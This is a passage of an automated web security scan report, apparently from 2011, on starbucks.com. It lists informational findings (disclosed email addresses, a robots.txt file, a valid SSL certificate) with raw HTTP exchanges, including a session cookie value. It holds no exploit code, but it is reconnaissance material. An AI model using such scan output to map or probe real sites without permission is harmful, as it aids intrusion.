Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:01 GMT
Connection: close
Content-Length: 51544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="mailto:webmaster@starbucks.com">webmaster@starbucks.com</a>
...[SNIP]...

7.5. http://www.starbucks.com/static/js/global.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /static/js/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/global.js HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 24 Jan 2011 21:21:35 GMT
Accept-Ranges: bytes
ETag: "25ee39aecbccb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:28 GMT
Content-Length: 30256

/* ---- SB Namespace ---- */
var SB = SB || {};

/*
hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
<http://cherne.net/brian/resources/jquery.hoverIntent.html>
@param f onMouseOver function || A
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

8. Robots.txt file

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of a robots.txt file does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 30 Sep 2010 19:28:44 GMT
Accept-Ranges: bytes
ETag: "5ecb44b2d560cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:27 GMT
Connection: close
Content-Length: 130

User-agent: *
Allow: /

User-agent: Adsbot-Google
Disallow: /

User-agent: Googlebot-Image
Disallow: /static/
Allow: /


9. SSL certificate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.starbucks.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Thu Aug 05 19:00:00 CDT 2010
Valid to:  Sun Aug 21 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
